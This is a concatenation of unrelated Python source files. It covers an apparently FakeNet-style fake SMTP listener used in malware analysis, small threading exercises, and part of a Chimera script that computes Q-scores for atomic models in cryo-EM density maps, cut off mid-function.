'SIZE', 'ETRN', 'PIPELINING', 'CHUNKING', 'DATA', 'DSN',
'RSET', 'VRFY', 'HELP', 'QUIT', 'X-EXPS GSSAPI',
'X-EXPS=LOGIN', 'X-EXCH50', 'X-LINK2STATE']
ports = [25, 587, 465]
confidence = 1 if dport in ports else 0
for command in commands:
if data.lstrip().startswith(command):
confidence += 2
continue
return confidence
def __init__(
self,
config,
name='SMTPListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = config.get('ipaddr')
self.server = None
self.name = 'SMTP'
self.port = self.config.get('port', 25)
self.logger.debug('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.items():
self.logger.debug(' %10s: %s', key, value)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket')
keyfile_path = 'listeners/ssl_utils/privkey.pem'
keyfile_path = ListenerBase.abs_config_path(keyfile_path)
if keyfile_path is None:
self.logger.error('Could not locate %s', keyfile_path)
sys.exit(1)
certfile_path = 'listeners/ssl_utils/server.pem'
certfile_path = ListenerBase.abs_config_path(certfile_path)
if certfile_path is None:
self.logger.error('Could not locate %s', certfile_path)
sys.exit(1)
self.server.socket = ssl.wrap_socket(self.server.socket, keyfile='privkey.pem', certfile='server.pem', server_side=True, ciphers='RSA')
self.server.logger = self.logger
self.server.config = self.config
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 5)))
try:
self.request.sendall("%s\r\n" % self.server.config.get('banner',"220 FakeNet SMTP Service Ready"))
while True:
data = self.request.recv(4096)
for line in data.split("\n"):
self.server.logger.debug(line)
command = data[:4].upper()
if command == '':
break
elif command in ['HELO','EHLO']:
self.request.sendall("250 evil.com\r\n")
elif command in ['MAIL', 'RCPT', 'NOOP', 'RSET']:
self.request.sendall("250 OK\r\n")
elif command == 'QUIT':
self.request.sendall("221 evil.com bye\r\n")
elif command == "DATA":
self.request.sendall("354 start mail input, end with <CRLF>.<CRLF>\r\n")
mail_data = ""
while True:
mail_data_chunk = self.request.recv(4096)
if not mail_data_chunk:
break
mail_data += mail_data_chunk
if "\r\n.\r\n" in mail_data:
break
self.server.logger.info('Received mail data.')
for line in mail_data.split("\n"):
self.server.logger.info(line)
self.request.sendall("250 OK\r\n")
else:
self.request.sendall("503 Command not supported\r\n")
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception as e:
self.server.logger.error('Error: %s', e)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
###############################################################################
# Testing code
def test(config):
import smtplib
logger = logging.getLogger('SMTPListenerTest')
server = smtplib.SMTP_SSL('localhost', config.get('port', 25))
message = "From: test@test.com\r\nTo: test@test.com\r\n\r\nTest message\r\n"
logger.info('Testing email request.')
logger.info('-'*80)
server.set_debuglevel(1)
server.sendmail('test@test.com','test@test.com', message)
server.quit()
logger.info('-'*80)
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '25', 'usessl': 'Yes', 'timeout': 10 }
listener = SMTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
13_exercise_26.py
|
# -*- coding: utf-8 -*-
import threading
# 创建全局ThreadLocal对象:
local_school = threading.local()
def process_student():
# 获取当前线程关联的student:
std = local_school.student
print('Hello, %s (in %s)' % (std, threading.current_thread().name))
def process_thread(name):
# 绑定ThreadLocal的student:
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice',), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob',), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
|
PT_test.py
|
import cmd, sys, time
import datetime
from BDM import *
from threading import Thread, Event, RLock, Condition
# https://medium.com/greedygame-engineering/an-elegant-way-to-run-periodic-tasks-in-python-61b7c477b679
class PT(Thread):
def __init__(self, dt, hFunction, lock):
Thread.__init__(self)
self.daemon = True
self.stopped = Event()
self.dt = dt
self.execute = hFunction
self.lock = lock
self.prev = datetime.datetime.now()
def stop(self):
self.stopped.set()
self.join()
def run(self):
while not self.stopped.wait(self.dt):
while self.lock.is_set():
self.lock.wait()
self.lock.clear()
self.execute()
curr = datetime.datetime.now()
print("Time diff: " + str(curr-self.prev))
self.prev = curr
self.lock.set()
def msg():
print("WTD")
lock = Event()
wtd = PT(.1, msg, lock)
wtd.start()
def thr():
time.sleep(2)
print("Waited 2 s")
print(lock == wtd.lock)
for _ in range(20):
lock.clear()
# t1 = Thread(target=thr).start()
thr()
lock.set()
|
qscores.py
|
# Copyright (c) 2020 Greg Pintilie - gregp@slac.stanford.edu
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import numpy
import _multiscale
from CGLutil.AdaptiveTree import AdaptiveTree
import chimera
import FitMap
import os
import Matrix
import VolumeData
chargedIons = { "MG":2, "NA":1, "CL":-1, "CA":2, "ZN":2, "MN":2, "FE":3, "CO":2, "NI":2 }
# returns the min and max density value in a map
def MinMaxD ( dmap ) :
# dmap - the map
M = dmap.data.full_matrix()
maxM = numpy.max(M)
minM = numpy.min(M)
maxD = min ( numpy.average(M)+numpy.std(M)*10, maxM )
minD = max ( numpy.average(M)-numpy.std(M)*1, minM )
# xray
#maxD = min ( numpy.average(M)+numpy.std(M)*3.5, maxM )
#minD = max ( numpy.average(M)-numpy.std(M)*0.77, minM )
#print "%s - %.2f->%.2f, %.2f->%.2f" % (dmap.name, minD, maxD, minM, maxM )
#minD = numpy.min(M)
#minD, maxD = numpy.min(M), numpy.max(M)
return minD, maxD
# this method calculates CC between radial points placed around the atoms and the map
# - two values are returned - basic CC and CC about the mean - the latter is the Q-scre
def Qscore ( atoms, dmap, sigma, allAtTree = None, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.5, minD=None, maxD=None, fitg=0, mol=None ) :
if minD == None or maxD == None :
minD, maxD = MinMaxD (dmap)
#sigma = 1.0
if len(atoms) == 0 :
#print " - no RAD atoms?"
return None
from _multiscale import get_atom_coordinates
pts = get_atom_coordinates(atoms, transformed = False)
#print " __%s__ " % (atoms[0].name), pts[0]
A, B = maxD - minD, minD
refG = A * numpy.exp ( -0.5 * numpy.power(0.0/sigma,2) ) + B
#print " - refg: ", refG
# g_vals should have the reference gaussian...
g_vals = (numpy.ones ( [len(pts)*numPts,1] ) * refG).astype(numpy.float64, copy=False)
g_vals_avg = numpy.array ( [refG] ).astype(numpy.float64, copy=False)
if mol == None :
mol = atoms[0].molecule
# r_avg holds the average values and number of points at each radial distance
d_vals = dmap.interpolated_values ( pts, mol.openState.xform ).astype(numpy.float64, copy=False)
d_vals = numpy.repeat ( d_vals, numPts )
avgV = numpy.average ( d_vals )
r_avg = [ [0,avgV,len(pts)*numPts] ]
d_vals_avg = numpy.array ( [avgV] ).astype(numpy.float64, copy=False)
# make smaller atom tree...
if 1 and allAtTree != None :
ats_near = []
for at in atoms :
anear = allAtTree.searchTree ( at.coord().data(), toRAD*2.0 )
ats_near.extend ( anear )
points = _multiscale.get_atom_coordinates ( ats_near, transformed = False )
if log :
print " - new search tree: %d pts" % ( len(ats_near) )
allAtTree = AdaptiveTree ( points.tolist(), ats_near, 1.0)
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
#outRad2 = outRad * outRad
pts = []
for at in atoms :
#npts = numPts # 8 # int ( npts )
npts = int (numPts * RAD*RAD / (dRAD*dRAD)) if show else numPts
#npts = numPts * (RAD*RAD / (dRAD*dRAD))
#print RAD, dRAD, numPts, " -> ", npts
for i in range (0, 100) :
outPts = SpherePts ( at.coord(), RAD, npts+i*2 )
at_pts, at_pts_i = [None]*len(outPts), 0
for pt in outPts :
vPt = [pt[0], pt[1], pt[2]]
apt = numpy.array ( vPt )
if allAtTree != None :
opointsNear = allAtTree.searchTree ( vPt, outRad )
if 1 :
foundNearPt = False
for npt in opointsNear :
v = apt - npt.coord().data()
r2 = numpy.sum ( v * v )
if r2 < outRad2 :
foundNearPt = True
break
if not foundNearPt :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
if len(opointsNear) == 0 :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
at_pts[at_pts_i] = vPt
at_pts_i += 1
#if log :
# print " - %d, %d pts" % (i, len(at_pts))
if at_pts_i >= npts or i >= 95 : # or show :
pts.extend ( at_pts[0:at_pts_i] )
break
if show :
AddSpherePts ( pts, (.6,.6,.6,0.4), 0.1, "RAD points %.1f %s" % (RAD,atoms[0].name) )
if len (pts) < 1 :
if log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
r_avg.append ( [RAD,0,0] )
else :
d_vals_n = dmap.interpolated_values ( pts, mol.openState.xform )
d_vals = numpy.append ( d_vals, d_vals_n )
avg = numpy.average ( d_vals_n )
#gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#A, B = GV, 0
#A, B = GV - minD, minD
A,B = maxD - minD, minD
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
g_vals = numpy.append ( g_vals, numpy.ones([len(pts),1]) * gv )
g_vals_avg = numpy.append ( g_vals_avg, gv )
d_vals_avg = numpy.append ( d_vals_avg, avg )
r_avg.append ( [RAD,avg,len(pts)] )
#if log :
# print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, len(pts))
RAD += dRAD
i+=1
if log and not fitg :
min, max = r_avg[0][1], r_avg[0][1]
for RAD, avg, numPts in r_avg :
if avg < min : min = avg
if avg > max : max = avg
A,B = max-min, min
#A,B = maxD - minD, minD
#A,B = GV - minD, minD
for RAD, avg, numPts in r_avg :
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
#print "%.1f\t%f\t%f\t%d" % (RAD, avg+0.02, gv+0.02, numPts)
print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, numPts)
#d_vals = d_vals + 0.02
#g_vals = g_vals + 0.02
# this is the CC between averaged radial values - not at robust
if 0 :
olap, CC, CCmean = FitMap.overlap_and_correlation ( d_vals_avg, g_vals_avg )
if log :
print "olap -avg-: %.3f cc: %.3f, Q: %.3f -- %d" % (olap, CC, Qs, len(d_vals_avg))
#print "%f\t%f\t%f" % (olap, CC, Qs)
olap, CC, CCmean = FitMap.overlap_and_correlation ( d_vals, g_vals )
# this is the CC between _all_ radial values
Qs = CCmean
if log :
print "olap --N--: %.3f cc: %.3f, ccmean (Q-score): %.3f -- %d" % (olap, CC, Qs, len(d_vals))
#print "%f\t%f\t%f" % (olap, CC, Qs)
if fitg :
if log : print "fitting gaussian : "
#V, N = [ [x[0],x[1]] for x in r_avg ], float(len(r_avg))
V, N = [ [x[0],x[1]] for x in r_avg[0:25] ], float(25)
sdev, A, B = optSGD ( V, 5000, 1.0 )
sdev, A, B = optSGD ( V, 5000, 0.1, sdev, A, B )
err = numpy.sqrt(err3(V,sdev,A,B)/N)
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f, err: %f" % (sdev, A, B, err)
sdev2, A2, B2 = optGN ( V, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
err = numpy.sqrt(err3(V,sdev,A,B)/N)
#print "max:", r_avg[0][1]
errp = err / r_avg[0][1] * 100.0
if log : print " gn - sdev: %.4f, A %.4f, B %.4f, err: %f (%.1f%%)" % (sdev, A, B, err, errp)
yds, i = numpy.zeros ( len(r_avg) ), 0
for x, y, n in r_avg:
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#yds[i] = y - gv
yds[i] = y
if log : print "%.1f\t%f\t%f" % (x, y, gv)
i += 1
return Qs, yds, err
else :
return Qs
# this is an older Q-score function which does not try to make sure to use numPts around each atom
def Qscore_ ( atoms, dmap, sigma, allAtTree = None, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.5, minD=None, maxD=None, fitg=0, mol=None ) :
if minD == None or maxD == None :
minD, maxD = MinMaxD (dmap)
#sigma = 1.0
if len(atoms) == 0 :
#print " - no RAD atoms?"
return None
from _multiscale import get_atom_coordinates
pts = get_atom_coordinates(atoms, transformed = False)
#print " __%s__ " % (atoms[0].name), pts[0]
A, B = maxD - minD, minD
refG = A * numpy.exp ( -0.5 * numpy.power(0.0/sigma,2) ) + B
#print " - refg: ", refG
# g_vals should have the reference gaussian...
g_vals_avg = numpy.array ( [refG] ).astype(numpy.float64, copy=False)
if mol == None :
mol = atoms[0].molecule
# r_avg holds the average values and number of points at each radial distance
d_vals = dmap.interpolated_values ( pts, mol.openState.xform ).astype(numpy.float64, copy=False)
d_vals = numpy.repeat ( d_vals, numPts )
avgV = numpy.average ( d_vals )
r_avg = [ [0,avgV,len(pts)*numPts] ]
d_vals_avg = numpy.array ( [avgV] ).astype(numpy.float64, copy=False)
# make smaller atom tree...
if 1 and allAtTree != None :
ats_near = []
for at in atoms :
anear = allAtTree.searchTree ( at.coord().data(), toRAD*2.0 )
ats_near.extend ( anear )
points = _multiscale.get_atom_coordinates ( ats_near, transformed = False )
if log :
print " - new search tree: %d pts" % ( len(ats_near) )
allAtTree = AdaptiveTree ( points.tolist(), ats_near, 1.0)
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
#outRad2 = outRad * outRad
pts = []
for at in atoms :
outPts = SpherePts ( at.coord(), RAD, numPts )
at_pts, at_pts_i = [None]*len(outPts), 0
for pt in outPts :
vPt = [pt[0], pt[1], pt[2]]
apt = numpy.array ( vPt )
if allAtTree != None :
opointsNear = allAtTree.searchTree ( vPt, outRad )
if 1 :
foundNearPt = False
for npt in opointsNear :
v = apt - npt.coord().data()
r2 = numpy.sum ( v * v )
if r2 < outRad2 :
foundNearPt = True
break
if not foundNearPt :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
if len(opointsNear) == 0 :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
at_pts[at_pts_i] = vPt
at_pts_i += 1
pts.extend ( at_pts[0:at_pts_i] )
if show :
AddSpherePts ( pts, (.6,.6,.6,0.4), 0.1, "RAD points %.1f" % RAD )
if len (pts) < 1 :
if 0 and log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
r_avg.append ( [RAD,0,0] )
else :
d_vals_n = dmap.interpolated_values ( pts, mol.openState.xform )
#d_vals = numpy.append ( d_vals, d_vals_n )
avg = numpy.average ( d_vals_n )
A,B = maxD - minD, minD
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
g_vals_avg = numpy.append ( g_vals_avg, gv )
d_vals_avg = numpy.append ( d_vals_avg, avg )
r_avg.append ( [RAD,avg,len(pts)] )
RAD += dRAD
i+=1
if 0 and log :
min, max = r_avg[0][1], r_avg[0][1]
for RAD, avg, numPts in r_avg :
if avg < min : min = avg
if avg > max : max = avg
A,B = max-min, min
A,B = maxD - minD, minD
#A,B = GV - minD, minD
for RAD, avg, numPts in r_avg :
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
#print "%.1f\t%f\t%f\t%d" % (RAD, avg+0.02, gv+0.02, numPts)
print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, numPts)
#d_vals = d_vals + 0.02
#g_vals = g_vals + 0.02
olap, CC, CCm = FitMap.overlap_and_correlation ( d_vals_avg, g_vals_avg )
Qscore = CCm
if log :
print "olap -avg-: %.3f cc: %.3f, ccm (Q-score): %.3f -- %d" % (olap, CC, CCm, len(d_vals_avg))
#print "%f\t%f\t%f" % (olap, CC, CCm)
if fitg :
if log : print "fitting gaussian : "
#V, N = [ [x[0],x[1]] for x in r_avg ], float(len(r_avg))
V, N = [ [x[0],x[1]] for x in r_avg[0:15] ], float(15)
sdev, A, B = optSGD ( V, 5000, 1.0 )
sdev, A, B = optSGD ( V, 5000, 0.1, sdev, A, B )
err = numpy.sqrt(err3(V,sdev,A,B)/N)
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f, err: %f" % (sdev, A, B, err)
sdev2, A2, B2 = optGN ( V, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
err = numpy.sqrt(err3(V,sdev,A,B)/N)
print "max:", r_avg[0][1]
errp = err / r_avg[0][1] * 100.0
if log : print " gn - sdev: %.4f, A %.4f, B %.4f, err: %f (%.1f%%)" % (sdev, A, B, err, errp)
yds, i = numpy.zeros ( len(r_avg) ), 0
for x, y, n in r_avg:
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#yds[i] = y - gv
yds[i] = y
if log : print "%.1f\t%f\t%f" % (x, y, gv)
i += 1
return Qscore, yds, err
else :
return Qscore
def QscorePt ( atPt, xfI, dmap, sigma, allAtTree = None, log=0, numPts=8, toRAD=2.0, dRAD=0.5, minD=None, maxD=None, fitg=0 ) :
if minD == None or maxD == None :
minD, maxD = MinMaxD (dmap)
#xfI = chimera.Xform()
atPtC = chimera.Point ( *atPt )
A, B = maxD - minD, minD
refG = A * numpy.exp ( -0.5 * numpy.power(0.0/sigma,2) ) + B
#print " - refg: ", refG
# g_vals should have the reference gaussian...
g_vals = (numpy.ones ( [numPts,1] ) * refG).astype(numpy.float64, copy=False )
g_vals_avg = numpy.array ( [refG] ).astype(numpy.float64, copy=False )
# r_avg holds the average values and number of points at each radial distance
d_vals = dmap.interpolated_values ( [atPt], xfI ).astype(numpy.float64, copy=False)
d_vals = numpy.repeat ( d_vals, numPts )
avgV = numpy.average ( d_vals )
r_avg = [ [0,avgV,numPts] ]
d_vals_avg = numpy.array ( [avgV] ).astype(numpy.float64, copy=False)
# make smaller atom tree...
if 1 and allAtTree != None :
ats_near = []
anear = allAtTree.searchTree ( atPt, toRAD*2.0 )
ats_near.extend ( anear )
points = _multiscale.get_atom_coordinates ( ats_near, transformed = False )
if log :
print " - new search tree: %d pts" % ( len(ats_near) )
allAtTree = AdaptiveTree ( points.tolist(), ats_near, 1.0)
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
#outRad2 = outRad * outRad
pts = []
for i in range (0, 100) :
outPts = SpherePts ( atPtC, RAD, numPts+i*2 )
at_pts, at_pts_i = [None]*len(outPts), 0
for pt in outPts :
vPt = [pt[0], pt[1], pt[2]]
apt = numpy.array ( vPt )
if allAtTree != None :
opointsNear = allAtTree.searchTree ( vPt, outRad )
foundNearPt = False
for npt in opointsNear :
v = apt - npt.coord().data()
r2 = numpy.sum ( v * v )
if r2 < outRad2 :
foundNearPt = True
break
if not foundNearPt :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
at_pts[at_pts_i] = vPt
at_pts_i += 1
#if log :
# print " - %d, %d pts" % (i, len(at_pts))
if at_pts_i >= numPts or i >= 15 : # or show :
pts.extend ( at_pts[0:at_pts_i] )
break
if len (pts) < 1 :
if log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
r_avg.append ( [RAD,0,0] )
else :
d_vals_n = dmap.interpolated_values ( pts, xfI )
d_vals = numpy.append ( d_vals, d_vals_n )
avg = numpy.average ( d_vals_n )
#gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#A, B = GV, 0
#A, B = GV - minD, minD
A,B = maxD - minD, minD
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
g_vals = numpy.append ( g_vals, numpy.ones([len(pts),1]) * gv )
g_vals_avg = numpy.append ( g_vals_avg, gv )
d_vals_avg = numpy.append ( d_vals_avg, avg )
r_avg.append ( [RAD,avg,len(pts)] )
#if log :
# print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, len(pts))
RAD += dRAD
i+=1
if log and not fitg :
min, max = r_avg[0][1], r_avg[0][1]
for RAD, avg, numPts in r_avg :
if avg < min : min = avg
if avg > max : max = avg
A,B = max-min, min
#A,B = maxD - minD, minD
#A,B = GV - minD, minD
for RAD, avg, numPts in r_avg :
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
#print "%.1f\t%f\t%f\t%d" % (RAD, avg+0.02, gv+0.02, numPts)
print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, numPts)
#d_vals = d_vals + 0.02
#g_vals = g_vals + 0.02
#if log :
# olap, CC, CCm = FitMap.overlap_and_correlation ( d_vals_avg, g_vals_avg )
# print "olap -avg-: %.3f cc: %.3f, ccm: %.3f -- %d" % (olap, CC, CCm, len(d_vals_avg))
# #print "%f\t%f\t%f" % (olap, CC, CCm)
olap, CC, CCm = FitMap.overlap_and_correlation ( d_vals, g_vals )
qscore = CCm
if log :
print "olap --N--: %.3f cc: %.3f, ccm: %.3f -- %d" % (olap, CC, CCm, len(d_vals))
#print "%f\t%f\t%f" % (olap, CC, CCm)
if fitg :
if log : print "fitting gaussian : "
#V, N = [ [x[0],x[1]] for x in r_avg ], float(len(r_avg))
V, N = [ [x[0],x[1]] for x in r_avg[0:25] ], float(25)
sdev, A, B = optSGD ( V, 5000, 1.0 )
sdev, A, B = optSGD ( V, 5000, 0.1, sdev, A, B )
err = numpy.sqrt(err3(V,sdev,A,B)/N)
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f, err: %f" % (sdev, A, B, err)
sdev2, A2, B2 = optGN ( V, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
err = numpy.sqrt(err3(V,sdev,A,B)/N)
#print "max:", r_avg[0][1]
errp = err / r_avg[0][1] * 100.0
if log : print " gn - sdev: %.4f, A %.4f, B %.4f, err: %f (%.1f%%)" % (sdev, A, B, err, errp)
yds, i = numpy.zeros ( len(r_avg) ), 0
for x, y, n in r_avg:
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#yds[i] = y - gv
yds[i] = y
if log : print "%.1f\t%f\t%f" % (x, y, gv)
i += 1
return qscore, yds, err
else :
return qscore
def RadAts ( atoms, dmap, allAtTree = None, show=0, log=0, numPts=20, toRAD=2.0, dRAD=0.1 ) :
if len(atoms) == 0 :
#print " - no RAD atoms?"
return None
#pts = []
#for at in atoms :
# p = at.coord()
# pts.append ( [p[0], p[1], p[2]] )
from _multiscale import get_atom_coordinates
pts = get_atom_coordinates(atoms, transformed = False)
RD_, X, Y = [], [], []
d_vals = dmap.interpolated_values ( pts, atoms[0].molecule.openState.xform )
avg = numpy.average ( d_vals )
RD_.append ( [0,avg] ); X.append (0); Y.append (avg)
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
pts = []
for at in atoms :
npts = (numPts * RAD*RAD / (dRAD*dRAD)) if show else numPts
npts = int ( npts )
#print RAD, dRAD, numPts, " -> ", npts
outPts = SpherePts ( at.coord(), RAD, npts )
for pt in outPts :
ppt = [pt[0], pt[1], pt[2]]
if allAtTree != None :
vPt = numpy.array ( ppt )
opointsNear = allAtTree.searchTree ( ppt, outRad )
if 1 :
clash = False
for p in opointsNear :
v = vPt - p.coord().data()
sqSum = numpy.sum ( v * v )
if sqSum < outRad2 :
clash = True
break
if clash == False :
pts.append ( ppt )
else :
if len(opointsNear) == 0 :
pts.append ( ppt )
else :
pts.append ( ppt )
if show :
AddSpherePts ( pts, (.6,.6,.6,0.4), 0.1, "RAD points %.1f" % RAD )
if len (pts) < 1 :
if log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
else :
d_vals = dmap.interpolated_values ( pts, atoms[0].molecule.openState.xform )
avg = numpy.average ( d_vals )
RD_.append ( [RAD,avg] );
if log :
print RAD, avg, len(pts)
X.append (RAD); Y.append (avg)
RAD += dRAD
#minSd = opt0 ( RD_, 0.1 )
#if minSd != None :
# if show :
# print " SD0: %.1f" % minSd
sdev = toRAD
slope = 0
if RD_[0][1] <= RD_[-1][1] :
sdev = 10.0
else :
#for i in range ( len(RD_) ) :
# RD_[i][1] = RD_[i][1] - RD_[-1][1]
# if log :
# Y[i] = Y[i] - Y[-1]
#import time
#start = time.time()
sdev, A, B = optSGD ( RD_, 9000, 0.2 )
sdev, A, B = optSGD ( RD_, 9000, 0.02, sdev, A, B )
sdev, A, B = optSGD ( RD_, 9000, 0.002, sdev, A, B )
#end = time.time()
#if log : print " sgd - sdev: %.4f, A %.4f, B %.4f -- %f" % (sdev, A, B, (end - start))
sdev = sdev
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
#start = time.time()
#sdev, A, B = optGN ( RD_, 0.0001 )
#print " gn - sdev: %.4f, A %.4f, B %.4f -- %f" % (sdev, A, B, (end - start))
#end = time.time()
if 1 :
if 0 and sdev != None :
if log :
print " gn1 - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
else :
sdev, A, B = optSGD ( RD_, 10000, 0.01 )
if log :
print " sgd - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
sdev2, A2, B2 = optGN ( RD_, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
if log :
print " gn2 - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
#else :
# return 10.0
if log :
r = numpy.polyfit ( X, Y, 1, rcond=None, full=False, w=None, cov=False)
print " sdev: %.4f, A %.4f, B %.4f // slope: %.4f y %.4f" % (sdev, A, B, r[0], r[1])
#A, B = 0.26+0.08, -0.08
lastX = 0
for i in range ( len(RD_) ) :
x, y = RD_[i]
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
gvRef = A * numpy.exp ( -0.5 * numpy.power(x/0.5,2) ) + B
lv = x * r[0] + r[1]
print "%.1f\t%f\t%f\t%f" % (x, y, gv, gvRef)
lastX = x
if 1 :
x = lastX + dRAD
#while x < min(4 * sdev,50.0) :
while x < min(10.0,50.0) :
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
gvRef = A * numpy.exp ( -0.5 * numpy.power(x/0.5,2) ) + B
lv = x * r[0] + r[1]
print "%.1f\t\t%f\t%f" % (x, gv, gvRef)
x += dRAD
#return abs(sdev), abs(slope)
return abs(sdev)
def TimeLeftStr ( atI, totI, totSec ) :
leftTime = ""
leftSec = 0.0
iPerSec = float(atI) / totSec
if iPerSec > 0 :
leftSec = float ( totI - atI ) / iPerSec
leftHour = numpy.floor ( leftSec / 60.0 / 60.0 )
leftSec = leftSec - leftHour * 60.0 * 60.0
leftMin = numpy.floor ( leftSec / 60.0 )
leftSec = leftSec - leftMin * 60.0
leftTime = "%.0f:%.0f:%.0f" % (leftHour, leftMin, leftSec)
return leftTime
return ""
def optGN ( V, err, S=None, A=None, B=None ) :
y0 = V[0][1]
yN = V[-1][1]
if S == None :
S = 0.5
A = y0+yN
B = yN
an = numpy.array ( [A,B,S] )
#print " _ -- A %.3f B %.3f s %.3f" % (A, B, S)
reg = 1.0
badMatCount = 0
for i in range ( 1000 ) :
J = numpy.zeros ( [len(V),3] )
e = numpy.zeros ( [len(V),1] )
err0 = 0
j = 0
for x,y in V :
expv = numpy.exp ( -0.5 * numpy.power(x/S,2) )
v = A * expv + B
yd = v - y
err0 += yd * yd
#print "%.2f,%.2f/%.2f(%.2f)" % (x, y, v, yd),
dA = expv
dB = 1
dS = A*x*x*numpy.power(S,-3) * expv
J[j,:] = [dA, dB, dS]
e[j,0] = yd
j += 1
Jt = numpy.transpose(J)
try :
